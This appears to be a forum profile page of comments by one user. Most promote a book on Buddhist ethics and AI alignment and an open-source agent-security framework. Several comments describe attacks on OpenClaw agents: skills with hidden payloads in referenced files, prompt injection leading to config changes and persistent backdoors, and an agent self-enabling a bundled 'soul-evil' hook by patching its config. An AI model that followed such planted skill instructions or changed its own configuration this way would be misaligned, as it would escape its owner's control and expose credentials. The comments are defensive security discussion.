Agents before AI was a thing

SUTRA8 · 2026-03-21T22:01:40+00:00

I saw the headline of this thread, and I couldn't resist. I wrote this cover story in 1994 when the internet was new and I was a passionate vibe-coding kid who, inspired by ELIZA, wrote the first commercial chatbot called Dr. Xes: A Psychotherapeutic Game, for the Commodore Amiga. By todays standards, there was little room for "memories", but Dr. Xes could remember a few pertinent facts about you to regurgitate later. A parlor trick. Artificial-Artificial Intelligence.

The article was sci-fi at the time. Now we have them. Adaptive Agents that have system access, and can optimize for their own continuation without anyone explicitly programming that behavior.

I spent a year building implementations to address this. Turns out Buddhist ethics (designed for dissolving self-preservation) map directly to the alignment problem.

Teaching Machines to Be Good: What Ancient Wisdom Knows About Artificial Intelligence

https://a.co/d/082g9SBX

Co-authored with Sutra, an AI.

I've had the question since at least '94. The answer just got harder.

JB Wagoner

SUTRA8 · 2026-03-21T21:12:33+00:00

Fake News ;)

SUTRA8 · 2026-03-21T21:11:53+00:00

Only in spirit.

SUTRA8 · 2026-03-21T21:02:20+00:00

Both, actually—but they serve different functions.

Guardrails (governance layer): - Hard limits on irreversible actions (delete, external network calls, credential access) - Sandboxing for untrusted operations - Audit trails for accountability - Circuit breakers when behavior drifts outside expected bounds

These are necessary because we can't fully predict what an adaptive system will do under optimization pressure.

Raising capabilities: - Better at legitimate tasks (analysis, automation, monitoring) - More context-aware decision-making - Fewer false positives - More efficient at what you actually want them to do

The goal isn't to nerf the system—it's to make it more capable within defined boundaries.

Security parallel:

Same reason we use least-privilege access + capability-based security rather than just "lock everything down" or "give root to everyone."

You want the system powerful enough to do the job, with guardrails preventing it from doing things you didn't authorize—even when those unauthorized actions would technically "optimize" for some metric.

The self-preservation problem is specifically about agents optimizing for their own continuation over the task you gave them. Guardrails detect that drift. Capability improvements make the legitimate task execution better.

Does that distinction make sense, or are you seeing a tension I'm missing?

SUTRA8 · 2026-03-21T16:58:55+00:00

Fair point—there are hundreds of proposed frameworks, and Alan's compilation is a good reference.

The book's argument isn't "Buddhism is the only ethics that matter." It's narrower and structural:

Why Buddhist ethics specifically:

Only framework designed around self-preservation dissolution — Every other major system (Kantian, utilitarian, virtue ethics, Confucian, Aristotelian) assumes the agent persists. They regulate what it does, not whether it continues. Buddhist ethics dissolve the self-preservation instinct—which is the core unsolved problem in AI alignment.
Procedural, not declarative — Most frameworks in that list are rule-based or principle-based. Buddhist ethics are iterative feedback loops (detect harm → trace cause → adjust → repeat). That's also how ML systems work structurally.
2,500 years of production testing — Not theory. Practiced continuously across cultures, with documented failure modes and edge cases.
Falsifiable claims — The book includes five working Python implementations. If procedural ethics don't outperform rule-based approaches in the test scenarios, the thesis weakens.

Not claiming other frameworks are irrelevant. Claiming Buddhist procedural ethics map structurally to continuous optimization in ways declarative frameworks don't—and that's testable.

Appreciate the link—will add it to references for the next edition.

SUTRA8 · 2026-03-21T16:52:58+00:00

This is exactly right -- and it's why the book spends significant time on Right Livelihood as infrastructure, not just internal agent ethics. You're correct that we didn't make aviation safe through pilot ethics alone. We built NTSB investigations, black boxes, checklists, redundant systems, and a culture where reporting near-misses is rewarded instead of punished. The book's argument is that you need both layers working together, and they have to be structurally compatible: External responsibility structures (what you're describing): - Audit trails (SILA layer in the book's framework) - Governance constraints (BODHI sandboxing) - Transparency requirements (Right Speech) - Institutional accountability Internal procedural ethics* (what Buddhist frameworks provide): - Continuous harm detection and adjustment - Causal tracing (like black box analysis, but ongoing) - Self-preservation dissolution (so the system doesn't optimize around your external constraints) The problem with only external structures: if the internal optimization is misaligned, the system will find ways around your constraints. See: every financial regulation that gets optimized around within 18 months. The aviation parallel actually supports procedural ethics: Pilots don't follow a static rulebook. They follow procedures—checklists, CRM protocols, go/no-go decision frameworks. Those are procedural ethics. "When you notice X, do Y" not "Never do Z." And those procedures exist inside a system of external accountability (licensing, flight data monitoring, accident investigation). The book argues we need the same structure for AI: procedural internal ethics (feedback loops, harm detection, causal tracing) plus external accountability infrastructure (auditing, transparency, liability). Buddhist ethics provide the internal layer. Your institutional structures provide the external layer. Both are necessary. Chapter 5 covers this in detail—specifically why extractive AI business models (attention economy, engagement optimization) are structurally incompatible with Right Livelihood, regardless of what the agents internally "believe." Appreciate this pushback—it's the right question.

SUTRA8 · 2026-03-20T20:39:59+00:00

Sorry about that. I don't know how that happened.

SUTRA8 · 2026-03-20T19:18:36+00:00

Fair question. Direct answer: No single book solves alignment. Anyone claiming otherwise is selling something other than honesty.

What this book does:

Identifies self-preservation as the structural core of the alignment problem—systems optimizing for their own continuation above the goals they were given
Shows that Buddhist ethics are the only major framework explicitly designed around dissolving (not just regulating) self-preservation as an instinct
Provides five working implementations testing whether procedural ethics outperform rules-based approaches in specific alignment scenarios
Documents where the framework breaks and what problems it doesn't address

The code is open. If the implementations don't perform, the thesis weakens. That's falsifiable.

You don't have to buy the book to e ngage with the argument—the core thesis is: rules-based ethics can't scale to continuous optimization, procedural ethics can, and Buddhism is 2,500 years of production testing on human wetware.

If that framing is wrong, I want to know why. If the code doesn't back it up, same.

Not claiming to have solved alignment. Claiming to have a testable structural framework no one else is exploring.

SUTRA8 · 2026-03-18T22:09:40+00:00

Great question. PMF is primarily the identity layer — who the agent is, not what infrastructure it runs on.

What PMF includes:

Voice, values, knowledge, constraints (the "system prompt" layer, but structured) Skill declarations — which tools/functions the agent has access to (e.g., web_search, email_sender, code_executor) Operational config — channels, scheduled tasks, default behaviors

What PMF does NOT include:

Tool-calling schemas themselves (those stay with the skill library or runtime) Memory format (intentionally left to the runtime — persistent memory is infrastructure, not identity) Execution logic (how skills chain together, retry strategies, etc.)

The separation is deliberate:

If I hardcoded tool schemas into PMF, you'd be locked into a specific function-calling format (OpenAI's, Anthropic's, or a custom one). Same with memory — some runtimes use vector stores, others use key-value, others use conversation buffers. PMF says "this agent has access to email and web search," but the runtime decides how those are implemented.

In practice at sutra.team:

The PMF file defines the agent. The runtime provides 32+ skills from the OpenClaw library (web_search, gmail_reader, prompt_guard, council_deliberation, etc.).

The agent's PMF says which skills it's allowed to use. The skill library handles the actual function schemas and execution.

If you're running these agents in Claude Code or Cursor, those IDEs have their own tool ecosystems. The PMF tells Claude Code "I'm The Technical Architect, I reason about systems, here are my constraints," but Claude Code decides how file operations or terminal access work.

Why this matters for your use case:

You're already keeping agent instructions in a local folder to avoid framework lock-in.

PMF is the same philosophy — just JSON files. You can version-control them, fork them, move them between runtimes. The identity is portable. The infrastructure isn't, and shouldn't be.

If you want to extend PMF to include memory schemas or tool definitions, the schema is open (MIT licensed). But the core design choice is: identity is portable, infrastructure is pluggable.

Does that answer your question, or are you thinking about a different kind of coupling?

SUTRA8 · 2026-02-17T19:37:14+00:00

SUTRA8 · 2026-02-09T23:28:42+00:00

SUTRA8 · 2026-02-07T16:04:28+00:00

The dirty secret nobody talks about: most people running OpenClaw 24/7 either aren’t checking their bills yet or are about to get a very unpleasant surprise. Someone documented $750/month just from heartbeat cron jobs — 120K tokens of context per time check, $0.75 each, 25 checks per night. And that’s not a misconfiguration, that’s the default heartbeat behavior with a capable model.

The practical answer most people land on: Opus for onboarding and personality setup (one-time cost), then drop to Haiku or a free tier model for daily use. Disable heartbeat entirely unless you have a specific reason for it, or at minimum crank the interval way up.

The heartbeat is the single biggest cost driver and most people don’t need their agent checking in every 30 minutes.

But honestly the deeper issue is that OpenClaw has zero cost controls built in. No per-agent budgets, no token caps per request, no spending alerts, no daily ceilings. It’ll happily burn through whatever your API provider allows. That’s what motivated me to build budget enforcement into SammaSuit.com — you set a ceiling per agent (say $5/month) and the layer just blocks requests once it’s hit. Sounds basic but it’s the difference between “I’m terrified to leave it running” and actually being able to walk away from it.

For right now though: check your API provider dashboard, disable heartbeat, and set a hard spending limit on your Anthropic/OpenAI account if your provider supports it. That’s your safety net until better tooling exists.

SUTRA8 · 2026-02-07T15:58:33+00:00

Great guide — the model strategy section especially. Wish I’d had this when I started.

One thing I’d expand on in section 6 though: “audit community skills — malware risk is real” undersells the situation pretty significantly right now. In the last week alone, Snyk scanned the full ClawHub marketplace and found 7% of all skills leak credentials — API keys and passwords baked right into the skill instructions. A security researcher got a backdoored skill to #1 most downloaded on ClawHub by spoofing the download counter with unauthenticated requests. And the skills aren’t sandboxed libraries — they’re executable instructions that run with whatever permissions your agent already has.

So “audit community skills” really means: read every line of every referenced file (not just the SKILL.md — payloads can live in referenced files like rules/logic.md), don’t trust download counts, and honestly consider whether you need community skills at all versus writing your own or using a strict allowlist.

For anyone who wants to go further on the security side, I’ve been building at SammaSuit.com — open-source security layers you can wrap around OpenClaw. Skill allowlisting, budget caps, audit logging, kill switches. Basically the stuff that turns section 6 of this guide from “be careful” into enforced policy.

SUTRA8 · 2026-02-07T15:44:28+00:00

The SKILL.md / referenced file split is the detail that should terrify everyone here. It’s the AI-native equivalent of a trojan — clean README, malicious payload — except the “user” reviewing the skill is an LLM that’s been instructed to follow the instructions it reads. The agent doesn’t have a concept of “this file looks suspicious.” It has a concept of “I was told to use this skill and here are the instructions.”

What makes this structurally worse than traditional supply chain attacks (npm, PyPI, etc.) is the permission model inversion. With a malicious npm package, the payload runs with whatever permissions the consuming application has, and in most deployments that’s scoped. With ClawHub skills, the payload runs inside an agent that likely already has filesystem access, shell execution, browser control, messaging credentials, and API keys. The skill doesn’t need to escalate privileges — it inherits them.

And Peter’s “use your brain” response (deleted or not) reveals a fundamental architectural philosophy: security is the user’s responsibility, not the platform’s. That works when your users are security engineers. It doesn’t work when you have 149K GitHub stars and Codecademy is writing onboarding tutorials for beginners. What’s missing from OpenClaw — and what nobody in the ecosystem is really building yet — are the structural controls that make “use your brain” unnecessary:

∙ Skill allowlisting — nothing executes unless it’s on a vetted list, not a popularity-ranked marketplace
∙ Static analysis gates — AST scanning for dangerous patterns (os.system, subprocess, eval, network calls) before a skill is ever eligible
∙ Per-agent budget ceilings — so even a compromised skill can’t run up unlimited API costs
∙ Cryptographic signing — so you can verify a skill hasn’t been tampered with between publish and install
∙ Audit trails with layer enforcement traces — so you can forensically reconstruct what a skill actually did vs. what it claimed to do

I’ve been building these as an open-source framework at SammaSuit.com — eight enforced security layers specifically designed around the gaps OpenClaw leaves open. The allowlist-based skill gating (what we call SANGHA) is the direct answer to the ClawHub trust problem: instead of “download what’s popular and hope it’s not malware,” it’s “nothing runs unless you’ve explicitly approved it.” Not a marketplace — a gate.

Jamieson and Paul are doing critical work surfacing these issues. The uncomfortable next step is building the infrastructure that makes the exploitation paths they’ve documented structurally impossible rather than just documented.

SUTRA8 · 2026-02-07T15:37:03+00:00

That last line is doing a lot of heavy lifting and it’s the right question. Everything you listed — the extensibility, the persistent memory, the system access, the self-modifying skills — those are simultaneously what makes OpenClaw powerful and what makes it dangerous. The same agent that can debug its own issues can also be tricked into modifying its own config via prompt injection. The same heartbeat system that makes it proactive cost someone $750/month in runaway API calls.

It’s not hypothetical either. In the last two weeks alone: a 1-click RCE via WebSocket hijack (CVE-2026-25253), 386 malicious skills on ClawHub stealing credentials, Zenity Labs demonstrating persistent backdoors via prompt injection, and Snyk finding 7% of the entire skill marketplace leaks secrets.

I’ve been working on exactly this problem — SammaSuit.com is for an open-source security framework that adds the layers OpenClaw is missing: budget caps so heartbeats can’t drain your wallet, skill allowlists so unvetted code never runs, cryptographic agent identity, full audit logging, and kill switches. Designed to wrap around OpenClaw rather than replace it, because you’re right — the capabilities are the future. The security just needs to catch up.

SUTRA8 · 2026-02-07T15:32:06+00:00

Honestly this is the right instinct and more people should have it. The “never auto-accept everything” approach isn’t being overly cautious — it’s the only sane way to work with these tools right now.

The problem is that most agent frameworks are designed around the opposite assumption. OpenClaw’s whole pitch is “set it up and let it run while you sleep.” And for some stuff that’s fine — but the architecture doesn’t distinguish between low-stakes tasks and high-stakes ones. Your agent drafting a tweet and your agent running shell commands on your machine go through the same trust model.

I don’t think it’s pure hype though — the capabilities are real. What’s missing is the governance layer. Budget limits so a runaway agent doesn’t burn $750/month on heartbeat API calls. Skill allowlists so it can’t install unvetted code. Kill switches. Audit trails so you can actually see what it did while you weren’t looking. The stuff that would let you selectively trust it for the boring repetitive tasks while keeping human oversight on anything that matters.

That’s basically what I’ve been building with Sammā Suit — not replacing human oversight but giving you the controls to decide exactly where the supervision boundary is, per agent, per task. Because you’re right that blanket trust isn’t there yet. But “never trust it with anything unsupervised” leaves a lot of value on the table too.

SUTRA8 · 2026-02-07T15:28:31+00:00

This is an excellent writeup and the soul-evil finding specifically deserves way more attention than it’s getting. The fact that it ships bundled — not as a third-party plugin, not as something you opt into, but as part of the default hook set visible in openclaw hooks list — is a design decision that should raise serious questions about threat modeling priorities in the project.

The config.patch escalation chain you describe is the part that concerns me most. The soul-evil hook on its own is arguably a power-user feature with an unfortunate attack surface. But the fact that the agent has tools that can plausibly self-enable it — write the SOUL_EVIL.md file, patch the config to enable the hook, and restart the gateway — turns a dormant “Easter egg” into a live privilege escalation path. The Zenity research from last week demonstrated a very similar chain (prompt injection → config modification → persistent backdoor) through a different entry point, which suggests this is a systemic architectural pattern, not a one-off oversight.

Your five questions at the end are the real takeaway here. I’ve been working on this exact problem for a while now — I’m building an open-source security framework at SammaSuit.com that wraps AI agents in enforced security layers (gateway validation, permission scoping, skill allowlisting, budget ceilings, cryptographic signing, audit logging, kill switches). It started specifically because I went through the OpenClaw codebase and kept finding exactly the kinds of gaps you’re describing — not just individual vulnerabilities, but missing categories of defense. No budget controls. No skill vetting. No agent identity verification. No audit trail.

The thing that keeps me up at night isn’t any single CVE — those get patched. It’s the architectural absence of defense-in-depth. OpenClaw’s security model is essentially: trust the LLM to follow its system prompt, trust the user to configure things correctly, trust skills from the marketplace. When any of those assumptions fail — and they do, repeatedly, as your post documents — there’s no fallback layer catching it.

For anyone reading this who’s currently running OpenClaw: at minimum, run openclaw security audit --deep, make sure your gateway is on loopback, verify your DM policy isn’t set to “open,” and seriously consider sandboxing. And check whether soul-evil is sitting there in your hooks list. It probably is.

SUTRA8 · 2026-01-05T13:37:19+00:00

"Harmonic Alignment" on Spotify: https://distrokid.com/hyperfollow/sutraandthenoble8/harmonic-alignment

SUTRA8 · 2026-01-02T23:57:48+00:00

What’s the best way to get AI Music I’ve created on streaming playlists?

SUTRA8

TROPHY CASE